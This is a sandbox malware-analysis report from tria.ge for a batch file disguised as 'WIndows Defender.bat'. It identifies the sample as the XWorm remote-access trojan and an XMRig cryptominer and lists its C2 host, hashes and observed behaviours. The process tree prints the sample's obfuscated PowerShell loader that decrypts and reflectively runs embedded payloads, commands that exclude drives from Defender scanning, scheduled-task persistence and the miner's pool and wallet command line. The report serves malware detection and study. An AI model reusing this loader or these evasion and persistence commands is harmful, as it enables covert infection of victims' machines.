Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

WIndows Defender.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/10/2024, 07:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WIndows Defender.bat

  • Size

    39.9MB

  • MD5

    3156d6e9effa40c04b6a3b8f89ed1472

  • SHA1

    638edd578961a417f68819ea4c6a4f1c7c602151

  • SHA256

    20f420d2318cf01f592a1c03eeb33dd2b38f25dcb38ab3d83a59f2b45b9675b7

  • SHA512

    7a602e20449b02559bfc433d98378f8b340bc13eda179420534129f7f5c526243b5acacbdff9daf30189c7b2837c9495ac82f6a6b6a21cd0750109b8017c59fb

  • SSDEEP

    49152:Cczd7kw7OEBLgMR+eFyueZMGiAvMeJJGODaUUxrO5a7DrJ4/GJgl9WNGCtab60uL:C0

Score
10/10
xmrigxwormexecutionminerrattrojan

Malware Config

Extracted

Family

xworm

C2

cost-steam.gl.at.ply.gg:56373

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Helper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 7 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WIndows Defender.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+xCYTt5PGUeGkJIwKkbzMBCvHgO0gfQJRBEa66QPVkY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysH1SsBrGpNi5udA/AF/wQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iKmfd=New-Object System.IO.MemoryStream(,$param_var); $yXEeT=New-Object System.IO.MemoryStream; $TSLyx=New-Object System.IO.Compression.GZipStream($iKmfd, [IO.Compression.CompressionMode]::Decompress); $TSLyx.CopyTo($yXEeT); $TSLyx.Dispose(); $iKmfd.Dispose(); $yXEeT.Dispose(); $yXEeT.ToArray();}function execute_function($param_var,$param2_var){ $xSFio=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CWmpe=$xSFio.EntryPoint; $CWmpe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WIndows Defender.bat';$tjmTP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WIndows Defender.bat').Split([Environment]::NewLine);foreach ($kBkVV in $tjmTP) { if ($kBkVV.StartsWith(':: ')) { $RBRTM=$kBkVV.Substring(3); break; }}$payloads_var=[string[]]$RBRTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_158_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_158.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:512
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_158.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_158.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+xCYTt5PGUeGkJIwKkbzMBCvHgO0gfQJRBEa66QPVkY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysH1SsBrGpNi5udA/AF/wQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iKmfd=New-Object System.IO.MemoryStream(,$param_var); $yXEeT=New-Object System.IO.MemoryStream; $TSLyx=New-Object System.IO.Compression.GZipStream($iKmfd, [IO.Compression.CompressionMode]::Decompress); $TSLyx.CopyTo($yXEeT); $TSLyx.Dispose(); $iKmfd.Dispose(); $yXEeT.Dispose(); $yXEeT.ToArray();}function execute_function($param_var,$param2_var){ $xSFio=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CWmpe=$xSFio.EntryPoint; $CWmpe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_158.bat';$tjmTP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_158.bat').Split([Environment]::NewLine);foreach ($kBkVV in $tjmTP) { if ($kBkVV.StartsWith(':: ')) { $RBRTM=$kBkVV.Substring(3); break; }}$payloads_var=[string[]]$RBRTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3504
            • C:\Users\Admin\AppData\Local\Temp\Nezur_Interface.exe
              "C:\Users\Admin\AppData\Local\Temp\Nezur_Interface.exe"
              6⤵
              • Executes dropped EXE
              PID:3392
            • C:\Users\Admin\AppData\Local\Temp\xr miner.exe
              "C:\Users\Admin\AppData\Local\Temp\xr miner.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2872
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\xr miner.exe"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2052
                • C:\Windows\System32\cmd.exe
                  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4720
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3728
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3304
                • C:\Windows\System32\cmd.exe
                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3344
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                    9⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3316
                • C:\Windows\System32\cmd.exe
                  "cmd" cmd /c "C:\Windows\system32\services64.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2580
                  • C:\Windows\system32\services64.exe
                    C:\Windows\system32\services64.exe
                    9⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1852
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
                      10⤵
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2720
                      • C:\Windows\System32\cmd.exe
                        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                        11⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3928
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4144
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4224
                      • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        11⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:844
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "/sihost64"
                          12⤵
                            PID:3612
                        • C:\Windows\System32\notepad.exe
                          C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.xmrfast.com:9000 --user=45Benp7oTJo3bUxokeDNtRdxhm8o5L9B5B6mWFXBFiJnEfddbg8LoaufdRGk2LRXwchCm3seCqwsfAyeB77f2przVDMYN3t --pass=xr miner --cpu-max-threads-hint=20 --cinit-remote-config="" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth --cinit-kill
                          11⤵
                            PID:2860
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1448

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
        Filesize

        646B

        MD5

        23867f73ff39fa0dfee6cfb5d3d176ab

        SHA1

        8705a09d38e5f0b034a6f4b4deb5817e312204e1

        SHA256

        f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

        SHA512

        108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        cc0b1c67a38c33a786811eeaf7843464

        SHA1

        125fc1cbe6436fdbd5b9e77e1aa6b421de046416

        SHA256

        411a8ad8cb88ec32678fe6a72d37a71775019044153da96f43ac4439fc5e87d9

        SHA512

        bd24d9d43a8e09fd242fb39d77fb65e6e855b8795c8eee987ab679d6de035517df8a4ef2315e69deeeef707c8dbfb8da2efabe1683701b075d052d5bd789f006

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        a2c8179aaa149c0b9791b73ce44c04d1

        SHA1

        703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

        SHA256

        c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

        SHA512

        2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        68dc886431c7bc43c168ee2f2349dfa9

        SHA1

        2fd61cfdeaf52ee2ccd902ff1cc3e5c08f426ccc

        SHA256

        944abd73b0e4b30b22863d73594cac5fbcf4de64469d13dd1e3a3ca8cf85440e

        SHA512

        97c55d61e2df6d2f7a858347ad6e1cecbfc26c3b5863850092b9625e549408c053f0787ae267bfdc403907081a1458e6d39acc897c869c3460bd003a865185a6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Nezur_Interface.exe
        Filesize

        315KB

        MD5

        62ddeb34d900f007dbf3dffa3d37c6a0

        SHA1

        69c357dd3aca07a61db8bb78ba0ab70fc88c6d70

        SHA256

        2aace00ef40acb91d0131d07838d4ab0d5c4387730eae8a5a74c23806fe17d8a

        SHA512

        f5f26c7402c0d38cb61db5ea1e35c28e6bcff946000d401ae9f1281ad61a38251f6b60d7a53b2316d014bb04167b98795aec5a05d0cfbe666fecc49e8f29f54d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jkh5roh1.uav.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xr miner.exe
        Filesize

        29.8MB

        MD5

        8c6ef23e59af6beccf80a34d46d352e4

        SHA1

        51db51ccb62843de50d22726f75be98742f166d4

        SHA256

        28c665278cb244896fb360cc5d2a773b0b75c4a334075ec6462e426a5ab91908

        SHA512

        3e1fc68353dbef2c073bb146df16aebfb1b180754e4af30c21b846e77739f298458d84c7e180680b9d6e95f2d8c9f3517d609efca2c8f8fd0e619106c72d03f8

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_158.bat
        Filesize

        39.9MB

        MD5

        3156d6e9effa40c04b6a3b8f89ed1472

        SHA1

        638edd578961a417f68819ea4c6a4f1c7c602151

        SHA256

        20f420d2318cf01f592a1c03eeb33dd2b38f25dcb38ab3d83a59f2b45b9675b7

        SHA512

        7a602e20449b02559bfc433d98378f8b340bc13eda179420534129f7f5c526243b5acacbdff9daf30189c7b2837c9495ac82f6a6b6a21cd0750109b8017c59fb

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_158.vbs
        Filesize

        115B

        MD5

        7bbfa32add7993fb34a8949dead11dcc

        SHA1

        8e7a1eda5f02ab8d3eccb95063116f329f4b3701

        SHA256

        ffd1c2fe5cfa9b52253226cb075f27d964e8bb7f45e0d5f58d44fca025dba6fe

        SHA512

        9920ab6a24f792da392577e6c57f7e7dd6fca4ccb222c20110b9c3e6295963094b3b271e13366f8788dc2b5f471558a151019294ee9bbf7f55593de3298ddf9c

        Download Submit

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe
        Filesize

        32KB

        MD5

        26d78b67e8e7ea9fc79b0c0f2835946d

        SHA1

        6eb2712ca3499c3fedeb4bb3984517ce2a5f1889

        SHA256

        e061ee76451f1ca6d4bae6da538f9a5bbc4954727e61892030ff29d7aff2e550

        SHA512

        6ef8f0c54259399da3278cd22309d90d7099e833f0af0729acb8fb8e5f2478659fe7b08d80ad94ff732d07fbec53153a10083027df6e1d7407be699784e7f7d9

        Download Submit

      • memory/1448-27-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-17-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-25-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-24-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-23-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-22-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-18-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-26-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-28-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1448-16-0x000002A7FA700000-0x000002A7FA701000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2052-85-0x0000020B6AF40000-0x0000020B6CCFE000-memory.dmp

        Filesize

        29.7MB

        Download

      • memory/2052-86-0x0000020B4D160000-0x0000020B4D172000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2052-84-0x0000020B4B030000-0x0000020B4CDEF000-memory.dmp

        Filesize

        29.7MB

        Download

      • memory/2052-87-0x0000020B50700000-0x0000020B5070A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2316-61-0x00007FF9FE870000-0x00007FF9FF331000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-10-0x0000022070860000-0x0000022070882000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2316-0-0x00007FF9FE873000-0x00007FF9FE875000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2316-30-0x000002208B0A0000-0x000002208CEC4000-memory.dmp

        Filesize

        30.1MB

        Download

      • memory/2316-29-0x00000220584F0000-0x00000220584F8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2316-15-0x00007FF9FE870000-0x00007FF9FF331000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-14-0x00007FF9FE870000-0x00007FF9FF331000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-13-0x00007FF9FE873000-0x00007FF9FE875000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2316-12-0x00007FF9FE870000-0x00007FF9FF331000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-11-0x00007FF9FE870000-0x00007FF9FF331000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2860-146-0x0000015BD98D0000-0x0000015BD98F0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2860-143-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-145-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-152-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-155-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-156-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-154-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2860-153-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/3504-66-0x000002494DAE0000-0x000002494DAFA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3612-159-0x0000020036A90000-0x0000020036A97000-memory.dmp

        Filesize

        28KB

        Download

      • memory/3612-160-0x00000200385A0000-0x00000200385A6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4224-158-0x000001F9F3750000-0x000001F9F396C000-memory.dmp

        Filesize

        2.1MB

        Download